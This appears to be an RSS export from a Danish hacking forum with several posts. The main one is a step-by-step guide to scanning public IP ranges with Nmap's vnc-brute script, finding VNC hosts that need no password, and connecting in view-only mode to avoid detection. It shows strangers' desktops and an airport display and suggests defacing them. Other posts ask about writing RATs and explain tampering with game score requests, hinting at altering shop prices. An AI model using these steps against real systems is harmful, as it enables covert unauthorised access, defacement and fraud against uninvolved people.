<img src="https://www.anonimg.com/img/0a0c959236017160d18730543de86b2d.png" alt="[Billede: 0a0c959236017160d18730543de86b2d.png]" class="mycode_img" /><br />
<span style="font-weight: bold;" class="mycode_b">Vi er ikke bare navnebrødre, hans skrivebord minder uhyggeligt meget om mit!</span><br />
<br />
<img src="https://www.anonimg.com/img/76f8deeccd6b6390737d8f585ecfc1c2.png" alt="[Billede: 76f8deeccd6b6390737d8f585ecfc1c2.png]" class="mycode_img" /><br />
<span style="font-weight: bold;" class="mycode_b">Her kunne man jo være fræk, og skrive sin egen besked. Måske enda lave lidt grafik der passer til. Har fundet flere af disse oplysningstavler - selv i en lufthavn - hvilket i værste fald kan medføre videre adgang til det interne system.</span></div>
<br />
[align=center]<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF1493;" class="mycode_color">Har MANGE flere hvor de kommer fra. Men tror det er betydeligt sjovere hvis i selv giver det et forsøg</span></span></span>]]></description>
			<content:encoded><![CDATA[<span style="color: #FF0000;" class="mycode_color">(Var lidt i tvivl om hvor den skulle placeres. Synes ikke helt brute-force var den rigtige sektion)</span><br />
<br />
Sad og nød min morgenkaffe sammen med dagens diverse nyheder, da jeg faldt over denne artikel fra Sophos' NakedSecurity blog:<br />
<span style="color: #4682B4;" class="mycode_color">(</span> <a href="https://nakedsecurity.sophos.com/2014/08/15/thousands-of-computers-open-to-eavesdropping-and-hijacking/" target="_blank" rel="noopener" class="mycode_url">https://nakedsecurity.sophos.com/2014/08...hijacking/</a> <span style="color: #4682B4;" class="mycode_color">)</span><br />
Det går i bund og grund ud på at skanne ip-rækker for VNC, og så teste om disse er usikre opsat og ikke benytter kodeord til fjernforbindelsen.<br />
<br />
Havde ikke selv tænkt på at dette var et problem der var så omfattende igen. Sidder ofte og skanner store rækker af IP'er igennem, og port 5900(standart VNC port) er alt efter mine intentioner en port jeg tit tilføjer til listen (Sammen med porten til den specifikke service jeg prøver at skaffe adgang til).<br />
Tænkte det ville være en god idé lige at afprøve deres fund selv, for at få et større indblik i, om dette nu også er et problem herhjemme i Danmark.<br />
<br />
Idéen var egentligt at skrive et lille hurtigt script til Nmap ved hjælp af NSE(Nmap Scripting Engine) og dettes tilhørende VNC library. Men før jeg nåede at lave mere end Head og Rule sektionerne (NSE består af Head, Rule og en Action sektion), faldt jeg over dette handy script:<br />
<span style="color: #4682B4;" class="mycode_color">(</span> <a href="https://svn.nmap.org/nmap/scripts/vnc-brute.nse" target="_blank" rel="noopener" class="mycode_url">https://svn.nmap.org/nmap/scripts/vnc-brute.nse</a> <span style="color: #4682B4;" class="mycode_color">)</span><br />
<br />
Hvad dette script gør, er at forbinde til en VNC service under skanningen, teste om forbindelsen kræver brugernavn OG kodeord eller KUN et kodeord. Hvis det eneste krav er et kodeord, forsøger scriptet at brute-force dette med de sædvanlige svage loginoplysninger vi stadig ser blive brugt.<br />
Af 'svage loginoplysninger' må siges at Intet Kodeord helt klart topper listen, og dette er der også taget hensyn for i vnc-brute.<br />
<br />
Jeg har endnu ikke været så heldig at brute-force et eksiterende kodeord, men tilgengældt har jeg fundet Massere af klienter der ikke har anvendt kodeord.<br />
<br />
Hvis det er noget i kunne tænke jer at give et forsøg, er det egentlig en UTROLIG let process. Selv for dem som måske ikke har brugt Nmap før.<br />
Her er en lille 'overflødig' gennemgang til jer der ikke har leget med det før:<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">1) Download og installér Nmap - eller Zenmap (GUI version med grafisk brugerflade)</span></span></span><br />
<a href="http://nmap.org/zenmap/" target="_blank" rel="noopener" class="mycode_url">http://nmap.org/zenmap/</a><br />
<span style="font-style: italic;" class="mycode_i">Har man Kali/Backtrack eller et andet sikkerheds-orienteret styresystem, burde Nmap selvfølgelig allerede være installeret. </span><br />
<img src="https://www.anonimg.com/img/e6f77f16aa0da6c35cd87a0425e2267b.png" alt="[Billede: e6f77f16aa0da6c35cd87a0425e2267b.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">2) Du skal efterhånden køre en Gammel version af Nmap for at dette script ikke er pakket sammen med programmet, men hvis du gør, så OPDATER for pokker. Hvis dette ikke er en mulighed, så kan scriptet downloades på nedenstående link:</span></span></span><br />
<a href="https://svn.nmap.org/nmap/scripts/vnc-brute.nse" target="_blank" rel="noopener" class="mycode_url">https://svn.nmap.org/nmap/scripts/vnc-brute.nse</a><br />
<img src="https://www.anonimg.com/img/e87d84ece28b458225c78f725a4f5d05.png" alt="[Billede: e87d84ece28b458225c78f725a4f5d05.png]" class="mycode_img" /><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">3) Nu kører vi Nmap eller Zenmap med følgende parametre (Om det er Nmap eller Zenmap er fuldstændig lige meget. Zenmap er KUN en integreret grafisk brugerflade til Nmap, og alle kommandoer og valgmuligheder er de samme:</span></span></span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">nmap -p 5900 --open --script vnc-brute 127.0.0.1</span></div></blockquote>
<br />
<img src="https://www.anonimg.com/img/f5e7d6116e09e8628c2c2b956f43b570.png" alt="[Billede: f5e7d6116e09e8628c2c2b956f43b570.png]" class="mycode_img" /></div>
<br />
<div style="text-align: center;" class="mycode_align"><blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">nmap:</span></span> Giver sig selv. Det er det program vi kører - resten er parametre.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">-p 5900:</span></span> Dette er porten vi vil skanne efter. (Her kan vi også skanne efter flere porte på éen gang - f. eks. -p 21,22,23,80,443,500-700 - sidstnævnte skanner alle porte i rækken 500 - 700. Et godt eksempel her kunne være at skanne efter en kendt port til et stykke Point-of-Sale software og samtidig se om maskinen det kører på tillader fjernstyrring.  <br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">--open:</span></span> Begrænser vores skanningen til KUN at vise resultater med åbne porte. Uden dette vil vi få en væg af tekst med lukkede og firewalled porte.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">--script vnc-brute:</span></span> Her vælger vi det script der skal testes på alle online maskiner med port 5900 åben. (Hvis scriptet ikke er pakket med Nmap kan du bruge '<span style="font-style: italic;" class="mycode_i">--script "C:\\StienTilFilen\\vnc-brute.nse"</span>'.<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #1E90FF;" class="mycode_color">127.0.0.1:</span></span> IP-adressen eller rækken der skal skannes efter. Hvis du vil skanne en række frem for en enkelt IP kan følgende bruges: <br />
<span style="font-weight: bold;" class="mycode_b">47.148.151.1-255</span> - Skanner 47.148.151.1 til 47.148.151.255<br />
<span style="font-weight: bold;" class="mycode_b">47.148.151-160.1-255</span> - Skanner 47.148.151.1 til 47.148.160.255</div></blockquote>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Når Nmap finder en VNC service der <span style="font-style: italic;" class="mycode_i">ikke</span> bruger kodeord, får vi fælgende output:</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #32CD32;" class="mycode_color">5900/tcp open  vnc<br />
<br />
|_vnc-brute: No authentication required</span></span></div></blockquote>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvis der bare står følgende (Uden VNC-Brute output):</span><br />
<blockquote class="mycode_quote"><cite>Citer:</cite><div style="text-align: left;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF6347;" class="mycode_color">5900/tcp open  vnc</span></span></div></blockquote>
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Betyder det et brugernavn også er krævet.</span></span><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size"><span style="color: #006400;" class="mycode_color">4) Nu kan vi så bruge RealVNC til at forbinde til IP-adressen:</span></span></span><br />
<a href="https://www.realvnc.com/download/" target="_blank" rel="noopener" class="mycode_url">https://www.realvnc.com/download/</a><br />
<span style="font-style: italic;" class="mycode_i">Download <span style="font-weight: bold;" class="mycode_b">VNC Viewer</span>. Det virker til alle de store styresytemer, og der er ingen grund til at hente den fulde pakke, da vi ikke har tænkt os at køre en server. </span><br />
<img src="https://www.anonimg.com/img/f7f272529348da33dcb050bf98f7e269.png" alt="[Billede: f7f272529348da33dcb050bf98f7e269.png]" class="mycode_img" /><br />
<br />
Her ville det være smart - <span style="color: #FF0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">FØR</span></span> - du trykker på <span style="font-weight: bold;" class="mycode_b">connect</span>, at gå ind i '<span style="font-weight: bold;" class="mycode_b">OPTIONS</span>' og trykke på den checkbox under '<span style="font-weight: bold;" class="mycode_b">Input</span>' der hedder '<span style="font-weight: bold;" class="mycode_b">View-only</span>'. Dette gør er vores tastatur og mus ikke forstyrre brugeren, og derved afslører vores tilstedeværelse.<br />
<img src="https://www.anonimg.com/img/3a927d9f555f24e27d5662d78c1f6ca3.png" alt="[Billede: 3a927d9f555f24e27d5662d78c1f6ca3.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF1493;" class="mycode_color">Her er der lige et par eksempler på, hvad man kan være heldig at få adgang til:</span></span></span><br />
<br />
<br />
<img src="https://www.anonimg.com/img/0a0c959236017160d18730543de86b2d.png" alt="[Billede: 0a0c959236017160d18730543de86b2d.png]" class="mycode_img" /><br />
<span style="font-weight: bold;" class="mycode_b">Vi er ikke bare navnebrødre, hans skrivebord minder uhyggeligt meget om mit!</span><br />
<br />
<img src="https://www.anonimg.com/img/76f8deeccd6b6390737d8f585ecfc1c2.png" alt="[Billede: 76f8deeccd6b6390737d8f585ecfc1c2.png]" class="mycode_img" /><br />
<span style="font-weight: bold;" class="mycode_b">Her kunne man jo være fræk, og skrive sin egen besked. Måske enda lave lidt grafik der passer til. Har fundet flere af disse oplysningstavler - selv i en lufthavn - hvilket i værste fald kan medføre videre adgang til det interne system.</span></div>
<br />
[align=center]<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #FF1493;" class="mycode_color">Har MANGE flere hvor de kommer fra. Men tror det er betydeligt sjovere hvis i selv giver det et forsøg</span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[hej ville selv side og lære noget java!.]]></title>
			<link>https://www.shellsec.pw/traad-hej-ville-selv-side-og-laere-noget-java</link>
			<pubDate>Sat, 01 Mar 2014 12:42:29 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-hej-ville-selv-side-og-laere-noget-java</guid>
			<description><![CDATA[jeg har påbegyndt noget der minder om java altså lignende med eksempelvis c#!.<br />
<br />
så ville høre om i kunne bidrage med noget viden som jeg kan lære af?.<br />
<br />
altså ville gerne starte på at lave nogle sockets og rats i forskellige definitioner så som hvis det er aktuelt for jer her og nu!.<br />
<br />
hvis det med sockets og de andre mulige metoder til fks. java og lignende må nogle godt poste deres viden om det her!. det er en bare ren nysgerrighed:). er selv lidt i gang med at kode java så det er for fedt!.]]></description>
			<content:encoded><![CDATA[jeg har påbegyndt noget der minder om java altså lignende med eksempelvis c#!.<br />
<br />
så ville høre om i kunne bidrage med noget viden som jeg kan lære af?.<br />
<br />
altså ville gerne starte på at lave nogle sockets og rats i forskellige definitioner så som hvis det er aktuelt for jer her og nu!.<br />
<br />
hvis det med sockets og de andre mulige metoder til fks. java og lignende må nogle godt poste deres viden om det her!. det er en bare ren nysgerrighed:). er selv lidt i gang med at kode java så det er for fedt!.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hack spils highscore med Tamper Data]]></title>
			<link>https://www.shellsec.pw/traad-hack-spils-highscore-med-tamper-data</link>
			<pubDate>Sat, 23 Mar 2013 00:06:19 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-hack-spils-highscore-med-tamper-data</guid>
			<description><![CDATA[Denne guide viser hvordan du kan bruge firefox addonet Tamper Data til at hacke highscores i flash spil. <br />
<br />
Hent og installer Taper data:<br />
<a href="https://addons.mozilla.org/en-us/firefox/addon/tamper-data/" target="_blank" rel="noopener" class="mycode_url">https://addons.mozilla.org/en-us/firefox...mper-data/</a><br />
<br />
I eksempelet her vil jeg gerne have den højeste highscore i spillet Boxhead:<br />
<a href="http://www.crazymonkeygames.com/Boxhead-2Play-Rooms.html" target="_blank" rel="noopener" class="mycode_url">http://www.crazymonkeygames.com/Boxhead-...Rooms.html</a><br />
<br />
Start spillet og spil så længe du gider. (eller lad dig dø med det samme). Du vil blive mødt af den skærm hvor du skal angive dit navn til highscorelisten.<br />
<br />
1. Indtast dit navn<br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/1-2.jpg" alt="[Billede: 1-2.jpg]" class="mycode_img" /><br />
<br />
2. Klik på <span style="font-weight: bold;" class="mycode_b">Funktioner</span> | <span style="font-weight: bold;" class="mycode_b">Tamper Data</span> i Firefox for at start Tamper Data<br />
<br />
Tamper Data åbnes<br />
3. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Start Tamper</span><br />
4. Klik på knappen <span style="font-weight: bold;" class="mycode_b">SEND SCORE</span> i browseren<br />
<br />
I Tamper Data åbnes en popup<br />
<br />
5. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Tamper</span><br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/2-2.jpg" alt="[Billede: 2-2.jpg]" class="mycode_img" /><br />
<br />
Herefter har du mulighed for at ændre ved de værdier som spillet sender til highscoren. I venstre side af dialogboksen findes en parameter, som bland andet indeholder informationer om hvilken scor du fik i spillet. <br />
<br />
6. Ændre scoren til det du ønsker- dog skal du i dette eksempel holde dig til 12 cifre.<br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/4-1.jpg" alt="[Billede: 4-1.jpg]" class="mycode_img" /><br />
<br />
7. Klik på knappen <span style="font-weight: bold;" class="mycode_b">OK</span><br />
<br />
Du vil herefter få endnu en popup i Tamper Data<br />
<br />
8. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Submit</span><br />
<br />
Herefter kan du stoppe Tamper Data<br />
<br />
9.Klik på <span style="font-weight: bold;" class="mycode_b">Stop Tamper</span><br />
<br />
Du bliver nu automatisk send til highscore listen, hvis ikke kan du selv gå til den.<br />
<br />
10.Klik på <span style="font-weight: bold;" class="mycode_b">View Highscore</span><br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/6.jpg" alt="[Billede: 6.jpg]" class="mycode_img" /><br />
<br />
Du vil nu se at du er kommet på highscore listen med den score du indsatte i Tamper Data<br />
<br />
<br />
Vær opmærksom på at ikke det ikke fungerer ved alle flashspil, da nogle af dem har indbyggede forskellige sikkerhedsparametre. Prøv dig lidt frem og se om du kan finde nogle flashspil hvor man skal submitte sin highscore til sidst.<br />
Det er rimelig simpelt eksempel, men Tamper Data kan bruges til meget mere end det. Forstil dig f.eks. hjemmesider hvor du kan ændre på prisen på en vare før du bestiller den.]]></description>
			<content:encoded><![CDATA[Denne guide viser hvordan du kan bruge firefox addonet Tamper Data til at hacke highscores i flash spil. <br />
<br />
Hent og installer Taper data:<br />
<a href="https://addons.mozilla.org/en-us/firefox/addon/tamper-data/" target="_blank" rel="noopener" class="mycode_url">https://addons.mozilla.org/en-us/firefox...mper-data/</a><br />
<br />
I eksempelet her vil jeg gerne have den højeste highscore i spillet Boxhead:<br />
<a href="http://www.crazymonkeygames.com/Boxhead-2Play-Rooms.html" target="_blank" rel="noopener" class="mycode_url">http://www.crazymonkeygames.com/Boxhead-...Rooms.html</a><br />
<br />
Start spillet og spil så længe du gider. (eller lad dig dø med det samme). Du vil blive mødt af den skærm hvor du skal angive dit navn til highscorelisten.<br />
<br />
1. Indtast dit navn<br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/1-2.jpg" alt="[Billede: 1-2.jpg]" class="mycode_img" /><br />
<br />
2. Klik på <span style="font-weight: bold;" class="mycode_b">Funktioner</span> | <span style="font-weight: bold;" class="mycode_b">Tamper Data</span> i Firefox for at start Tamper Data<br />
<br />
Tamper Data åbnes<br />
3. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Start Tamper</span><br />
4. Klik på knappen <span style="font-weight: bold;" class="mycode_b">SEND SCORE</span> i browseren<br />
<br />
I Tamper Data åbnes en popup<br />
<br />
5. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Tamper</span><br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/2-2.jpg" alt="[Billede: 2-2.jpg]" class="mycode_img" /><br />
<br />
Herefter har du mulighed for at ændre ved de værdier som spillet sender til highscoren. I venstre side af dialogboksen findes en parameter, som bland andet indeholder informationer om hvilken scor du fik i spillet. <br />
<br />
6. Ændre scoren til det du ønsker- dog skal du i dette eksempel holde dig til 12 cifre.<br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/4-1.jpg" alt="[Billede: 4-1.jpg]" class="mycode_img" /><br />
<br />
7. Klik på knappen <span style="font-weight: bold;" class="mycode_b">OK</span><br />
<br />
Du vil herefter få endnu en popup i Tamper Data<br />
<br />
8. Klik på knappen <span style="font-weight: bold;" class="mycode_b">Submit</span><br />
<br />
Herefter kan du stoppe Tamper Data<br />
<br />
9.Klik på <span style="font-weight: bold;" class="mycode_b">Stop Tamper</span><br />
<br />
Du bliver nu automatisk send til highscore listen, hvis ikke kan du selv gå til den.<br />
<br />
10.Klik på <span style="font-weight: bold;" class="mycode_b">View Highscore</span><br />
<br />
<img src="http://i57.photobucket.com/albums/g207/Spagnum/6.jpg" alt="[Billede: 6.jpg]" class="mycode_img" /><br />
<br />
Du vil nu se at du er kommet på highscore listen med den score du indsatte i Tamper Data<br />
<br />
<br />
Vær opmærksom på at ikke det ikke fungerer ved alle flashspil, da nogle af dem har indbyggede forskellige sikkerhedsparametre. Prøv dig lidt frem og se om du kan finde nogle flashspil hvor man skal submitte sin highscore til sidst.<br />
Det er rimelig simpelt eksempel, men Tamper Data kan bruges til meget mere end det. Forstil dig f.eks. hjemmesider hvor du kan ændre på prisen på en vare før du bestiller den.]]></content:encoded>
		</item>
	</channel>
</rss>